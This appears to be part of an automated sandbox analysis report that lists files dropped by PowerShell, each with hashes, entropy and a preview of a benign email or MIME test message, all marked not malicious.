                                                                                                                                                                                                            SHA-256:46C391E25D3F2FA622D5781A27553176648270768435295A235A760BF725752F
                                                                                                                                                                                                            SHA-512:8536850C822EB654A2EB8A9D21B9D8983D032820779CA9AE5759374FE509088D7AFF243357F089BB57F24E65F4E60C8DCC38FFDB0850FA1A687C61ED286E6107
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:Received: from xcar [192.168.0.2] by jeeves.wooster.local.. (SMTPD32-7.07 EVAL) id AFF92F0214; Sun, 12 May 2002 08:55:37 +0100..Date: Sun, 12 May 2002 08:56:15 +0100..From: Father Time <father.time@xcar.wooster.local>..To: timbo@jeeves.wooster.local..Subject: IMAP file test..Message-ID: <6df65d354b.father.time@rpc.wooster.local>..X-Organization: Home..User-Agent: Messenger-Pro/2.50a (MsgServe/1.50) (RISC-OS/4.02) POPstar/2.03..MIME-Version: 1.0..Content-Type: multipart/mixed; boundary="1618492860--2051301190--113853680"..Status: R..X-UIDL: 319998302....This message is in MIME format which your mailer apparently does not support...You either require a newer version of your software which supports MIME, or..a separate MIME decoding utility. Alternatively, ask the sender of this..message to resend it in a different format.....--1618492860--2051301190--113853680..Content-Type: text/plain; charset=us-ascii....Simple email with attachment.......--1618492860--2051301190--113853680..Content-
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:SMTP mail, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):578
                                                                                                                                                                                                            Entropy (8bit):5.330687250842338
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:k11JjD4JKm/eF2XwXmBQe28bayO1LnKL+KYLETKLu:STjD4Ji5Xmq1TXKYQT1
                                                                                                                                                                                                            MD5:ECF907082425783FE2A94AC5B787F5FF
                                                                                                                                                                                                            SHA1:6CF4D0F9C1D613076B535DB2B8488374605B2516
                                                                                                                                                                                                            SHA-256:3D33F36E79C3406C72AEAC084DF89C84D522FC9953EC3FBB31E8C90F53F87B21
                                                                                                                                                                                                            SHA-512:3795C18874EADDE3EFAA2CE09C8F3DD79FF19818FE66056EEAE995CE0DD4EAC57F6758A11B30AD1262038184DAFF0C09050EFE4C44B78D3AC4785B257BBAF09E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:Return-Path: <aperson@dom.ain>.Received: by mail.dom.ain (Postfix, from userid 889)..id B9D0AD35DB; Tue, 4 Jun 2002 21:46:59 -0400 (EDT).Message-ID: <15613.28051.707126.569693@dom.ain>.Date: Tue, 4 Jun 2002 21:46:59 -0400.MIME-Version: 1.0.Content-Type: text/plain; charset=us-ascii.Content-Transfer-Encoding: 7bit.Subject: bug demonstration..12345678911234567892123456789312345678941234567895123456789612345678971234567898112345678911234567892123456789112345678911234567892123456789..more text.From: aperson@dom.ain (Anne P. Erson).To: bperson@dom.ain (Barney P. Erson)..test.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:news or mail, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):380
                                                                                                                                                                                                            Entropy (8bit):5.13812996050758
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:+WXmBQ6b8FpjLQ6oQX3/eQ8KMW0YDUHff5aOVRlvvIPLQ6oQX3/eQ8KMW0YDUHf+:nXmBQfxQJC32QAxas16QJC32QAxasin
                                                                                                                                                                                                            MD5:B489861F9C2AA89AE3E44B0D8782D49B
                                                                                                                                                                                                            SHA1:1D28856A9191DF9A016DDB21A7BD47550D53C296
                                                                                                                                                                                                            SHA-256:C82275D275DC73870A4C8BC4962C1462CB477C6A6323788C591003AB421973D4
                                                                                                                                                                                                            SHA-512:BC63E19845DE921A931EA163A1E2F5402AFA2F47577A5B36F5D7A90B510F3B4CE161A52729570B4D21074CF23FC28C4D7AC427AF69F722BE89530021EFA3CE65
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:From: aperson@dom.ain.MIME-Version: 1.0.Content-Type: multipart/digest; boundary=BOUNDARY..--BOUNDARY.Content-Type: message/rfc822..Content-Type: text/plain; charset=us-ascii.To: aa@bb.org.From: cc@dd.org.Subject: ee..message 1..--BOUNDARY.Content-Type: message/rfc822..Content-Type: text/plain; charset=us-ascii.To: aa@bb.org.From: cc@dd.org.Subject: ee..message 2..--BOUNDARY--.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:SMTP mail, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):583
                                                                                                                                                                                                            Entropy (8bit):5.4370776047186
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:k116Jrnsx4JKmPgNJsXmBQwtLNwwNg0H8Th48jgVB0d+pzYfCE3Qv5iv:S4Jrnsx4JSJsXmvwwq3yjpzSciv
                                                                                                                                                                                                            MD5:D333DAD6440B4DF4978207A0308E2C72
                                                                                                                                                                                                            SHA1:A9FDA954AA5875346E96BD5BD749BE4FCC231E14
                                                                                                                                                                                                            SHA-256:FE19E3503F22DA78A9920C4831A4FA121410FF76430DC10FDD81144DDBDDDB01
                                                                                                                                                                                                            SHA-512:AAF733540802AFF1630F89E0DE138782A2DDAA112D3A6D5BEB2EB14769842D8BACF638EF4112B779BADB838C66F26F69B70F70C3B4EDCFEBC4662C1165313541
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:Return-Path: <bbb@zzz.org>.Delivered-To: bbb@zzz.org.Received: by mail.zzz.org (Postfix, from userid 889)..id 27CEAD38CC; Fri, 4 May 2001 14:05:44 -0400 (EDT).MIME-Version: 1.0.Content-Type: text/plain; charset=us-ascii;. title*0*="us-ascii'en'This%20is%20even%20more%20";. title*1*="%2A%2A%2Afun%2A%2A%2A%20";. title*2="isn't it!".Content-Transfer-Encoding: 7bit.Message-ID: <15090.61304.110929.45684@aaa.zzz.org>.From: bbb@ddd.com (John X. Doe).To: bbb@zzz.org.Subject: This is a test message.Date: Fri, 4 May 2001 14:05:44 -0400...Hi,..Do you like this message?..-Me.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:news or mail, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):322
                                                                                                                                                                                                            Entropy (8bit):5.127120114716202
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:+WXmBQ6b8FplQ8KMW0YDUHff5aOVRlvvIJQ8KMW0YDUHff5aOVRin:nXmBQfHQAxas1qQAxasin
                                                                                                                                                                                                            MD5:524238F232F74C03700E03AD8F92E6F3
                                                                                                                                                                                                            SHA1:D6B32AE45107F9461E7EE1D49D10DDB6533197F1
                                                                                                                                                                                                            SHA-256:4398E2153AFE488F1D629B4192A2DA8A743B10ED55F3E26ED662BD9E2718D789
                                                                                                                                                                                                            SHA-512:5DB4A45AD923B59D905B9E00C24722BD15B2A645537D6831BCF5BDA6836E90E716696E6FD918A9D78EFA6BB2B399694084F5D1023119013852A32DDE3E4D26AC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:From: aperson@dom.ain.MIME-Version: 1.0.Content-Type: multipart/digest; boundary=BOUNDARY..--BOUNDARY..Content-Type: text/plain; charset=us-ascii.To: aa@bb.org.From: cc@dd.org.Subject: ee..message 1..--BOUNDARY..Content-Type: text/plain; charset=us-ascii.To: aa@bb.org.From: cc@dd.org.Subject: ee..message 2..--BOUNDARY--.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:news or mail, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):200
                                                                                                                                                                                                            Entropy (8bit):5.052882273157448
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:m6WWXWMKE4IeAtISin/BQyE+KKalIeAtRATmlLEmvvIQKKalIeAtRATmlLElvHJn:+WXmBQ67JwLQ8KfvvIPLQ8Kon
                                                                                                                                                                                                            MD5:AF049868DB1235193D6F4D4DC9B4F9C4
                                                                                                                                                                                                            SHA1:BC098C97C4B8A9C753EE031F58BC3E0D0A7E1FBA
                                                                                                                                                                                                            SHA-256:C9D406692BA3573699A2E1F58713CC2E5A65792DF472217AAAF8402DD0C29356
                                                                                                                                                                                                            SHA-512:8C8B73566AE9A732F8E24FA84C7595CA42AE6559ADA304031CBD9A88BF4BBD93BB2BD4B13C0DFA632D5523017F057A6FE8091819625D1196012DBD2446B1BEAB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:From: aperson@dom.ain.MIME-Version: 1.0.Content-Type: multipart/mixed; boundary=BOUNDARY_..--BOUNDARY.Content-Type: text/plain..message 1..--BOUNDARY.Content-Type: text/plain..message 2..--BOUNDARY--.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:SMTP mail, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):418
                                                                                                                                                                                                            Entropy (8bit):5.1988567356924404
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:jhrp2TjGTsfYQdLS75RM8mBQlLo7wF8cr:jhrpniePM8mOjFBr
                                                                                                                                                                                                            MD5:D89A98399941E974920032491CD69886
                                                                                                                                                                                                            SHA1:2F5F379251D497F05351319682CBDE062197F2F7
                                                                                                                                                                                                            SHA-256:B41254E201645EECA3D0C9CA84BA7726C8C21B3796C04CBB9E20D8A2B51EE894
                                                                                                                                                                                                            SHA-512:46E61C3D70B3A2BC4DD72FB5A3EFDDA615DAAA95CB24F503CA584E276BEA7C31CB9C54F4FA628BADD4818052B529ED6429ABF4996C80397BD9B30863327D8C3B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:Delivered-To: freebsd-isp@freebsd.org.Date: Tue, 26 Sep 2000 12:23:03 -0500.From: Anne Person <aperson@example.com>.To: Barney Dude <bdude@example.com>.Subject: Re: Limiting Perl CPU Utilization....Mime-Version: 1.0.Content-Type: text/plain; charset*=ansi-x3.4-1968''us-ascii.Content-Disposition: inline.User-Agent: Mutt/1.3.8i.Sender: owner-freebsd-isp@FreeBSD.ORG.Precedence: bulk.X-Loop: FreeBSD.org..Some message..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:SMTP mail, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):750
                                                                                                                                                                                                            Entropy (8bit):5.368776244318496
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:jhrpd6wGrsfYQdLS75RM8mBQd0J9MLCI3BQLwcYIbLb+7pF8cyeQlLo7WAQ0AZUG:jhrpdBGKePM8ml/QCc8wcB3bMFByl18i
                                                                                                                                                                                                            MD5:8170E05C633DA34CD445541BE5AE53DE
                                                                                                                                                                                                            SHA1:79E5F2B1346E2C74DA9AC6A1B04BF8E1CC1A4C9D
                                                                                                                                                                                                            SHA-256:CC35E6CC84C00EB7D5E2BDF9CEB8977EB94C2BCC1630EA93C6C4B82381406DAD
                                                                                                                                                                                                            SHA-512:9BEC9EB7E3055772EB7E318D96980BB597DD2E4948C66A4C771643F57F52512B63537A7C2FAEEAB76226470B4585AF64E7AC2386835B4AA8D47C18419FFAA95A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:Delivered-To: freebsd-isp@freebsd.org.Date: Wed, 27 Sep 2000 11:11:09 -0500.From: Anne Person <aperson@example.com>.To: Barney Dude <bdude@example.com>.Subject: Re: Limiting Perl CPU Utilization....Mime-Version: 1.0.Content-Type: multipart/signed; micalg*=ansi-x3.4-1968''pgp-md5;..protocol*=ansi-x3.4-1968''application%2Fpgp-signature;..boundary*="ansi-x3.4-1968''EeQfGwPcQSOJBaQU".Content-Disposition: inline.Sender: owner-freebsd-isp@FreeBSD.ORG.Precedence: bulk.X-Loop: FreeBSD.org...--EeQfGwPcQSOJBaQU.Content-Type: text/plain; charset*=ansi-x3.4-1968''us-ascii.Content-Disposition: inline.Content-Transfer-Encoding: quoted-printable..part 1..--EeQfGwPcQSOJBaQU.Content-Type: text/plain.Content-Disposition: inline..part 2..--EeQfGwPcQSOJBaQU--.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:news or mail, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):300
                                                                                                                                                                                                            Entropy (8bit):4.854119372179028
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:XLYQ6b8FpCeQ8K5k4RRyqQQIkXgsmqMG/6TVNL1i9WHQIkn:XLYQfseQWURTQdkwLqMG4vWWHqn
                                                                                                                                                                                                            MD5:924961579F14D1D54257745C7042E8EF
                                                                                                                                                                                                            SHA1:1C6470BE5B54A932390F8B90F273D84DAF35820A
                                                                                                                                                                                                            SHA-256:F1EFCD32A4B669ED5EED317926A11646C05922FC49B815568EF2C3858D5BEC27
                                                                                                                                                                                                            SHA-512:2C1D0134B20586E894D9DDB7DBCF712A40DFD617A130A7CEFFF2E8E617A75659394676B8212C0FC043FC76D16682C059103F5AF22761DA7C804024A8D9DDA8A2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:From: aperson@dom.ain.To: bperson@dom.ain.Content-Type: multipart/digest; boundary=XYZ..--XYZ.Content-Type: text/plain...This is a text plain part that is counter to recommended practice in.RFC 2046, $5.1.5, but is not illegal..--XYZ..From: cperson@dom.ain.To: dperson@dom.ain..A submessage..--XYZ--.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:news or mail, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):136
                                                                                                                                                                                                            Entropy (8bit):4.508006725822106
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:m6WF1wL1XAGGWsMYvlHLLcPknWxeHY4MiLN3A6n:XL5cDvlbnIO/Mie6
                                                                                                                                                                                                            MD5:BC81D0F30D8C07E9201354C6EA2DBDBD
                                                                                                                                                                                                            SHA1:663C07242970CE3132503785708EFD1CFA397C4A
                                                                                                                                                                                                            SHA-256:3E4D25CC162E76FD6C5CC50BA26DFC4E71AEDBC34F08AC850EFBF934AB3C7AB1
                                                                                                                                                                                                            SHA-512:218B810FA6277946DABD1A4C4A2A544666E65F3873A04EA5F193C7415470FE7871A0F8F5D3CA1F3D36584FAE69398E567B0F4AF182A3C4BEE846F60FA4C3881F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:From: aperson@dom.ain.To: bperson@dom.ain.Subject: here's something interesting.counter to RFC 2822, there's no separating newline here.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):816
                                                                                                                                                                                                            Entropy (8bit):5.218426049541715
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:w2mBQjntf88VHLXDKmY3IWeQj8rRPPQiY1r8mAAl0QYL48bVHePQiY13VHfaSeBD:w2mql8Oj47J69RtiSeB+8n
                                                                                                                                                                                                            MD5:290C6739A56AE65E542C8781CD79EBE6
                                                                                                                                                                                                            SHA1:D50D99FF0B0886CBEE913133DCA272F801ACCE76
                                                                                                                                                                                                            SHA-256:79E4CB253305C42E22D5631BED2D57E795A70D0356D0C04E3AC395AB73051C52
                                                                                                                                                                                                            SHA-512:9E3F90A899947C0932FF1631189A26C2C364E0F86D07FB07168AE725C7E882AB6ADB3D80C7276ED5D5D3ECF9F4BE45FF88B58B849BBE61ACC9DF62A471DB423B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:Mime-Version: 1.0.Content-Type: Multipart/Mixed; Boundary="NextPart".To: IETF-Announce:;.From: Internet-Drafts@ietf.org.Subject: I-D ACTION:draft-ietf-mboned-mix-00.txt.Date: Tue, 22 Dec 1998 16:55:06 -0500..--NextPart..Blah blah blah..--NextPart.Content-Type: Multipart/Alternative; Boundary="OtherAccess"..--OtherAccess.Content-Type: Message/External-body;..access-type="mail-server";..server="mailserv@ietf.org"..Content-Type: text/plain.Content-ID: <19981222151406.I-D@ietf.org>..ENCODING mime.FILE /internet-drafts/draft-ietf-mboned-mix-00.txt..--OtherAccess.Content-Type: Message/External-body;..name="draft-ietf-mboned-mix-00.txt";..site="ftp.ietf.org";..access-type="anon-ftp";..directory="internet-drafts"..Content-Type: text/plain.Content-ID: <19981222151406.I-D@ietf.org>...--OtherAccess--..--NextPart--..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:multipart/mixed; boundary=ABCDE, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):209
                                                                                                                                                                                                            Entropy (8bit):4.424365242593789
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:/eQ67JgWqpAQ8G0m1qoWqpAQ8wqoWqoWqoWqpAQ8wkn:/eQBeQJ06eQhQQeQg
                                                                                                                                                                                                            MD5:F56F272721A1CFDB0E86D6D3E0827CE2
                                                                                                                                                                                                            SHA1:F1F54ACC0734E8F000D9DC5071B3CAE6ED435626
                                                                                                                                                                                                            SHA-256:98B9EE99D099269D838A12B6FA3B0AF725565418EC1FEDD8A522ACCCC0DF88DE
                                                                                                                                                                                                            SHA-512:6AD3E934F7E4F04FA92C439907D5F6373EE41E4834E744416F1248E74960DD075844FDAC870C6840275F2CFCD3314C47B90AEA36D02BBD1C2A1AF85FDD022110
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:Content-Type: multipart/mixed; boundary=ABCDE..--ABCDE.Content-Type: text/x-one..Blah..--ABCDE.--ABCDE.Content-Type: text/x-two..Blah..--ABCDE.--ABCDE.--ABCDE.--ABCDE.Content-Type: text/x-two..Blah..--ABCDE--.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:MIME entity, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2548
                                                                                                                                                                                                            Entropy (8bit):4.908820932215212
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:mgoqeJ4+iST17OX9RmCQ1XSuG4+twyt4+jd9CjA0XYelS:mgoqeJBiSdOX90CQ1XSuGBtwytBj7CjY
                                                                                                                                                                                                            MD5:CEC2AE10906E99DD30EB09C65FFB0AF3
                                                                                                                                                                                                            SHA1:4F8260C15539BD484A5EFCC6F42889F1B4504D5B
                                                                                                                                                                                                            SHA-256:0107D3183911047EC758A69BEC7E24EDBA03838C00331C5004208D850BD57747
                                                                                                                                                                                                            SHA-512:0B427F45D104D77A39165659A8C119F4472B259F5B6580FF1030C9BFC6D3E9F837ED49DBB0AE86A251ABAF18B90D54E36D17589ADDAD81E6CB40211159AA75C8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MIME-Version: 1.0.Content-Type: multipart/mixed; boundary="----- =_aaaaaaaaaa0"..------- =_aaaaaaaaaa0.Content-Type: multipart/mixed; boundary="----- =_aaaaaaaaaa1".Content-ID: <20592.1022586929.1@example.com>..------- =_aaaaaaaaaa1.Content-Type: multipart/alternative; boundary="----- =_aaaaaaaaaa2".Content-ID: <20592.1022586929.2@example.com>..------- =_aaaaaaaaaa2.Content-Type: text/plain.Content-ID: <20592.1022586929.3@example.com>.Content-Description: very tricky.Content-Transfer-Encoding: 7bit...Unlike the test test_nested-multiples-with-internal-boundary, this.piece of text not only contains the outer boundary tags .------- =_aaaaaaaaaa1 .and .------- =_aaaaaaaaaa0 .but puts them at the start of a line! And, to be even nastier, it.even includes a couple of end tags, such as this one:..------- =_aaaaaaaaaa1--..and this one, which is from a multipart we haven't even seen yet!..------- =_aaaaaaaaaa4--..This will, I'm sure, cause much breakage of MIME parsers. But, as .far as I can t
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:MIME entity, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1955
                                                                                                                                                                                                            Entropy (8bit):4.857134172520761
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:3XmgoqL4DJ4+nbxInxIRX4+HxI35xI7X4+CxIH9CjxIXKNXXYerqmS:mgoqeJ4+b82X4+HSEX4+C89CjDXXYelS
                                                                                                                                                                                                            MD5:D9DDE09EED5A496788688F0652A96CFB
                                                                                                                                                                                                            SHA1:E52FA94CB38DB047F4ACB8AFFFAC14E4397F29E1
                                                                                                                                                                                                            SHA-256:5B3F5E5EAAB13CA96387DD517A8864C25FCBBBC0DFFD0F8580F07B30EC8E1DFF
                                                                                                                                                                                                            SHA-512:C2660454E581BFEAF03388E159A412DA7F6BC4BFC6765D12FB8A7739D5032A38E85CB7D2B69135455794F0CD0200BF47ABAB18294979DFAE92229EA4E8B51F99
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MIME-Version: 1.0.Content-Type: multipart/mixed; boundary="----- =_aaaaaaaaaa0"..------- =_aaaaaaaaaa0.Content-Type: multipart/mixed; boundary="----- =_aaaaaaaaaa1".Content-ID: <20592.1022586929.1@example.com>..------- =_aaaaaaaaaa1.Content-Type: multipart/alternative; boundary="----- =_aaaaaaaaaa1".Content-ID: <20592.1022586929.2@example.com>..------- =_aaaaaaaaaa1.Content-Type: application/octet-stream.Content-ID: <20592.1022586929.3@example.com>.Content-Description: patch1.Content-Transfer-Encoding: base64..XXX..------- =_aaaaaaaaaa1.Content-Type: application/octet-stream.Content-ID: <20592.1022586929.4@example.com>.Content-Description: patch2.Content-Transfer-Encoding: base64..XXX..------- =_aaaaaaaaaa1--..------- =_aaaaaaaaaa1.Content-Type: multipart/alternative; boundary="----- =_aaaaaaaaaa1".Content-ID: <20592.1022586929.6@example.com>..------- =_aaaaaaaaaa1.Content-Type: application/octet-stream.Content-ID: <20592.1022586929.7@example.com>.Content-Description: patch3.Content-Tr
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:MIME entity, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):197
                                                                                                                                                                                                            Entropy (8bit):5.029776836945867
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:uWXWMKE4IeAtRATWIJaHJInAFywrwFywneIeAtRATWIJTQAILItSnMJcPiQwFywl:3XmBQ8a0CInAFRwFAQ8a0TQAWntpwFD
                                                                                                                                                                                                            MD5:27E880E1FBF80075FF676B76CAC6DF50
                                                                                                                                                                                                            SHA1:01FDF82EA6165CA438C8ED2446B88C8EAF942064
                                                                                                                                                                                                            SHA-256:D59F6E422B9AD6163924BC1FB70AE8B697A11282D5B32B02708B40CB9A7D82EE
                                                                                                                                                                                                            SHA-512:BB59C5FEC2A6B56E08976057EDFB9112320C45C49C33C3E58EF043E2584131ACC8F77B052D0DBFE4325B59098426E6A58086E945755C209690E4436E8D70B06B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MIME-Version: 1.0.Content-Type: text/html; boundary="--961284236552522269"..----961284236552522269.Content-Type: text/html;.Content-Transfer-Encoding: 7Bit..<html></html>..----961284236552522269--.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:news or mail, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                            Entropy (8bit):5.19350309403516
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:lk3QGmVHFLlGVP/MUIVPKS4GxXVmfM/7RFKgf8nxoWXWMKE4IeAtISTOBT7v/CqY:lVbHFAVnC9zOHx9XmBQ6/F/79Wv
                                                                                                                                                                                                            MD5:1111F57890BC01C3384752E0E37CE55C
                                                                                                                                                                                                            SHA1:77C1AEE5598B062353AA4F7952B1C1F9D44B0A12
                                                                                                                                                                                                            SHA-256:F95478516949AB993D14634219A6F62A4470F46CCBDF434D9A2C5526FB0263E9
                                                                                                                                                                                                            SHA-512:B81468849052DABFD0BF706D03EB2421DFBB62DFE2C0401B8693C2E78E4E1DD5AECE37013AEF7976880A75191686B0551A2346CF5AD8817367724358B60F2C5D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:From: "Allison Dunlap" <xxx@example.com>.To: yyy@example.com.Subject: 64423.Date: Sun, 11 Jul 2004 16:09:27 -0300.MIME-Version: 1.0.Content-Type: multipart/alternative;..Blah blah blah.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:multipart/mixed; boundary="AAA", ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):313
                                                                                                                                                                                                            Entropy (8bit):5.057540221110479
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:/eQ67JLkKojW0AUVnCIyJV2GzQItmRLQ6oQX3PGgz6f3DBQ67J2nldan:/eQ+o1GIAvTqQJC3PGgzeQ7e
                                                                                                                                                                                                            MD5:E316BD8CE0B291CD97997BD0AD6CE2F1
                                                                                                                                                                                                            SHA1:3A7B332D613881042C5A913BF6195A89CAE20FAA
                                                                                                                                                                                                            SHA-256:E2305D3CD3097FF4FA587D2C2BECFEB700D3D340EEF0F3B701FF78B0F0EC898C
                                                                                                                                                                                                            SHA-512:00F256768B037374A30AC6FFA975A50583E7C9D602DF66CEAF51DE49FB45109DB6FBBA856DE15746E19730C3748548302BC7FE199C60FBA7797A66E356825C33
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:Content-Type: multipart/mixed; boundary="AAA".From: Mail Delivery Subsystem <xxx@example.com>.To: yyy@example.com..This is a MIME-encapsulated message..--AAA..Stuff..--AAA.Content-Type: message/rfc822..From: webmaster@python.org.To: zzz@example.com.Content-Type: multipart/mixed; boundary="BBB"..--BBB--..--AAA--.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (917)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9166
                                                                                                                                                                                                            Entropy (8bit):5.327984936802181
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Ia1orrWJO7tFD9DPDHDPD/DPD/D/DnDVDPDPDXDXDFDtDPD/D1DFDFDlDPDFDUM:C7tFD9DPDHDPD/DPD/D/DnDVDPDPDXDV
                                                                                                                                                                                                            MD5:93992F3BEBC941E5C45A95FFB6A29799
                                                                                                                                                                                                            SHA1:4E589B14C06FC87F6B2F5BD3552D7F7BAEA1971E
                                                                                                                                                                                                            SHA-256:045797FF45987136A2A5712F8F8310710E0944E4B4547BAB2DC99933EDD1BC9A
                                                                                                                                                                                                            SHA-512:90C6F1C167DC47DD9AED9AE7522749DB2FE4F1EA0344C6929BC487CD28ACC3B5F05E0B30FE4704219F4BBFDAEC4E4385DD5FBC7E9DBB3422E79FD80C5C31EC3A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
